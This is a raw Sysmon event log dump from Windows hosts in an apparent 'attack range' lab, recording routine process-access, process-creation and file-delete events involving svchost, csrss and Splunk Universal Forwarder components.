10:40:49.836{4F8D34B0-F11C-6215-0C00-000000003902}7283600C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000214942Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:40:49.836{4F8D34B0-F11C-6215-0C00-000000003902}7283600C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000214941Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:40:49.836{4F8D34B0-F11B-6215-0500-000000003902}412428C:\Windows\system32\csrss.exe{4F8D34B0-0F31-6216-1604-000000003902}1176C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000214940Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:40:49.836{4F8D34B0-F11D-6215-2300-000000003902}20363828C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{4F8D34B0-0F31-6216-1604-000000003902}1176C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000214939Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:40:49.837{4F8D34B0-0F31-6216-1604-000000003902}1176C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe8.0.2Registry monitorsplunk ApplicationSplunk Inc.splunk-regmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{4F8D34B0-F11B-6215-E703-000000000000}0x3e70SystemMD5=91F33F605825B72EE2270559C7AB28F3,SHA256=3DF1CB71BB48B8669BD01179FD94DD8CC82F8103B08A0FACFD366E43E0C5FA42,IMPHASH=23D7D4307FBE7FA4F42B1902826D7C25{4F8D34B0-F11D-6215-2300-000000003902}2036C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 10341000x8000000000000000214938Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:40:49.664{4F8D34B0-0F31-6216-1504-000000003902}28923168C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe{4F8D34B0-F11D-6215-2300-000000003902}2036C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e675|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e1a6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+6b453|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+8e8530|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000214937Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:40:49.321{4F8D34B0-F11E-6215-2B00-000000003902}27842804C:\Windows\system32\conhost.exe{4F8D34B0-0F31-6216-1504-000000003902}2892C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000214936Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:40:49.321{4F8D34B0-F11C-6215-0C00-000000003902}7283600C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000214935Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:40:49.321{4F8D34B0-F11C-6215-0C00-000000003902}7283600C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000214934Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:40:49.321{4F8D34B0-F11C-6215-0C00-000000003902}7283600C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000214933Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:40:49.321{4F8D34B0-F11C-6215-0C00-000000003902}7283600C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000214932Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:40:49.321{4F8D34B0-F11C-6215-0C00-000000003902}7283600C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000214931Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:40:49.321{4F8D34B0-F11C-6215-0C00-000000003902}7283600C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000214930Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:40:49.321{4F8D34B0-F11C-6215-0C00-000000003902}7283600C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000214929Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:40:49.321{4F8D34B0-F11C-6215-0C00-000000003902}7283600C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000214928Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:40:49.321{4F8D34B0-F11C-6215-0C00-000000003902}7283600C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000214927Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:40:49.321{4F8D34B0-F11B-6215-0500-000000003902}4121208C:\Windows\system32\csrss.exe{4F8D34B0-0F31-6216-1504-000000003902}2892C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000214926Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:40:49.321{4F8D34B0-F11D-6215-2300-000000003902}20363828C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{4F8D34B0-0F31-6216-1504-000000003902}2892C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000214925Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:40:49.322{4F8D34B0-0F31-6216-1504-000000003902}2892C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe-----"C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe" --ps2C:\Windows\system32\NT AUTHORITY\SYSTEM{4F8D34B0-F11B-6215-E703-000000000000}0x3e70SystemMD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241,IMPHASH=45491F0E80AC016364EB8FB78BD23A1C{4F8D34B0-F11D-6215-2300-000000003902}2036C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x8000000000000000214954Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:40:50.336{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=0DBFF022413BA79F018B233BFFB863B9,SHA256=CF865792E70FFB8333F547A3C1D48D5145BB3F54C5E6D752652FB9302A2D597C,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000214953Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:40:50.164{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=DECA7F68847224F38A3145AA61470312,SHA256=B6085357AE3E903C1FB2015DD619AC1FADD839AA45BD48C1689C325213E0B9C7,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000214952Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:40:50.086{4F8D34B0-0F31-6216-1604-000000003902}1176696C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe{4F8D34B0-F11D-6215-2300-000000003902}2036C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+5691a5|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+568cd6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+56657|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+56ca7|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+8f3800|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000285902Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:40:50.781{C8EA50B7-F11F-6215-0C00-000000003802}8285152C:\Windows\system32\svchost.exe{C8EA50B7-F2AF-6215-C100-000000003802}5080C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+12f1c|C:\Windows\SYSTEM32\psmserviceexthost.dll+15b2b|C:\Windows\SYSTEM32\psmserviceexthost.dll+1011d|C:\Windows\SYSTEM32\psmserviceexthost.dll+104a0|C:\Windows\SYSTEM32\psmserviceexthost.dll+13952|C:\Windows\SYSTEM32\psmserviceexthost.dll+16139|C:\Windows\SYSTEM32\psmserviceexthost.dll+16c03|C:\Windows\SYSTEM32\resourcepolicyserver.dll+1a70e|C:\Windows\SYSTEM32\resourcepolicyserver.dll+14fc2|C:\Windows\SYSTEM32\resourcepolicyserver.dll+c61d|C:\Windows\SYSTEM32\resourcepolicyserver.dll+118d9|C:\Windows\SYSTEM32\resourcepolicyserver.dll+b91a|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c 10341000x8000000000000000285901Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:40:50.781{C8EA50B7-F11F-6215-0C00-000000003802}8285152C:\Windows\system32\svchost.exe{C8EA50B7-F2AF-6215-C200-000000003802}4300C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+12f1c|C:\Windows\SYSTEM32\psmserviceexthost.dll+15b2b|C:\Windows\SYSTEM32\psmserviceexthost.dll+1011d|C:\Windows\SYSTEM32\psmserviceexthost.dll+104a0|C:\Windows\SYSTEM32\psmserviceexthost.dll+13952|C:\Windows\SYSTEM32\psmserviceexthost.dll+16139|C:\Windows\SYSTEM32\psmserviceexthost.dll+16c03|C:\Windows\SYSTEM32\resourcepolicyserver.dll+1a70e|C:\Windows\SYSTEM32\resourcepolicyserver.dll+14fc2|C:\Windows\SYSTEM32\resourcepolicyserver.dll+c61d|C:\Windows\SYSTEM32\resourcepolicyserver.dll+118d9|C:\Windows\SYSTEM32\resourcepolicyserver.dll+b91a|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c 10341000x8000000000000000285900Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:40:50.781{C8EA50B7-F11F-6215-0C00-000000003802}8282732C:\Windows\system32\svchost.exe{C8EA50B7-F2AF-6215-C200-000000003802}4300C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\psmserviceexthost.dll+78b1|C:\Windows\SYSTEM32\psmserviceexthost.dll+74d7|C:\Windows\SYSTEM32\psmserviceexthost.dll+12fce|C:\Windows\SYSTEM32\psmserviceexthost.dll+15b2b|C:\Windows\SYSTEM32\psmserviceexthost.dll+1011d|C:\Windows\SYSTEM32\psmserviceexthost.dll+104a0|C:\Windows\SYSTEM32\psmserviceexthost.dll+13952|C:\Windows\SYSTEM32\psmserviceexthost.dll+16139|C:\Windows\SYSTEM32\psmserviceexthost.dll+16c03|C:\Windows\SYSTEM32\resourcepolicyserver.dll+1a70e|C:\Windows\SYSTEM32\resourcepolicyserver.dll+14fc2|C:\Windows\SYSTEM32\resourcepolicyserver.dll+c61d|C:\Windows\SYSTEM32\resourcepolicyserver.dll+118d9|C:\Windows\SYSTEM32\resourcepolicyserver.dll+b91a|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c 10341000x8000000000000000285899Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:40:50.781{C8EA50B7-F11F-6215-0C00-000000003802}8282732C:\Windows\system32\svchost.exe{C8EA50B7-F2AF-6215-C100-000000003802}5080C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+12f1c|C:\Windows\SYSTEM32\psmserviceexthost.dll+15b2b|C:\Windows\SYSTEM32\psmserviceexthost.dll+1011d|C:\Windows\SYSTEM32\psmserviceexthost.dll+104a0|C:\Windows\SYSTEM32\psmserviceexthost.dll+13952|C:\Windows\SYSTEM32\psmserviceexthost.dll+16139|C:\Windows\SYSTEM32\psmserviceexthost.dll+16c03|C:\Windows\SYSTEM32\resourcepolicyserver.dll+1a70e|C:\Windows\SYSTEM32\resourcepolicyserver.dll+14fc2|C:\Windows\SYSTEM32\resourcepolicyserver.dll+c61d|C:\Windows\SYSTEM32\resourcepolicyserver.dll+118d9|C:\Windows\SYSTEM32\resourcepolicyserver.dll+b91a|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\W